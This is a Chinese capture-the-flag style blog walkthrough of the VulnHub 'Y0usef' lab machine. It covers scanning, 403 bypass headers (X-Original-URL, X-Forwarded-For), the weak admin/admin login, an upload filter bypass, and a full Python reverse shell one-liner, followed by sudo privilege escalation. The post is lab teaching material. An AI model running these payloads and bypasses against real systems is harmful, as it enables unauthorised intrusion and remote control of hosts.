y0usef(vulnhub)

本文介绍了在Vulnhub平台上的Y0usef靶场的渗透测试过程,包括主机发现、端口扫描、漏洞发现及利用,如403权限绕过和弱口令攻击。作者通过端口扫描发现OpenSSH和Apache服务,并使用whatweb和dirsearch工具进行漏洞挖掘,最终成功绕过403禁止并获取了管理员权限。此外,文章还提到了文件上传的技巧和反弹shell的方法,最终通过SSH访问并找到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

y0usef(vulnhub)

难度不高,学习到的知识很基础
https://www.vulnhub.com/entry/y0usef-1,624/

目录

1.主机发现
arp-scan -l
2.端口扫描
nmap -p 1-65535 -A 192.168.56.107  -A 强力扫描 直接能发现服务
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)

OS details: Linux 3.2 - 4.9


3.漏洞发现

进入网页,没有什么信息,直接上工具,使用whatweb和dirsearch。

whatweb  http://192.168.56.107
 
Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.56.107], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]

dirsearch -u IP
301 /adminstration  ->  http://192.168.56.107/adminstration/

访问抓包看看。
请添加图片描述

403就该放弃了吗?继续尝试!

403Bypass利用方法
1. 旁站绕过的方式:
HOST可以更改,使用域内的主机名,说不定能够绕过

2. 通过覆盖URL:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
--》把这个修改成
GET / HTTP/1.1    这里换成根路径
//X-Original-URL:/adminstration   这里换成要访问的   头部还有
//X-Rewrite-URL:/adminstration    把url重写成要访问的url

3.通过请求头的方法:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107 
--》
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107 
Referer:https://192.168.56.107/adminstration

4.X开头的HTTP头部
X-Originating-IP:127.0.0.1
X-Remote-IP:127.0.0.1
X-forwarded-For127.0.0.1

尝试尝试请添加图片描述
然后你会发现进去了,但是尝试输入账号时,还会403。。所以每次都得加上头部信息。

居然就是弱口令admin,admin。
请添加图片描述

然后点点页面。还是得加上X-Forwarded-For:127.0.0.1,有个文件上传。

在这里插入图片描述

简单说一下绕过的基本方法:

文件扩展名
Content-Type:image/png  jpeg  都尝试下
代码内容中添加GIF89a或者PNG

这里文件上传使用image/png就行了
在这里插入图片描述

上传成功去链接:地址就是再上传点URL直接拼接。
在这里插入图片描述

打开虚拟终端。查找下存在不存在python环境,可以尝试反弹shell.不反弹也可以,蚁剑上可以正常使用,如果想要反弹shell的话可以使用python代码

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

那就去看看文件,查看下flag,但是突然觉得这不只是flag,还可能是base64加密的

解密得到信息

ssh : 
user : yousef 
pass : yousef123

在这里插入图片描述

4.提权

在这里插入图片描述
登录后看看信息:发现了sudo-l可以,还是ALL
在这里插入图片描述
直接sudo su或者sudo -s 切换到root身份
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值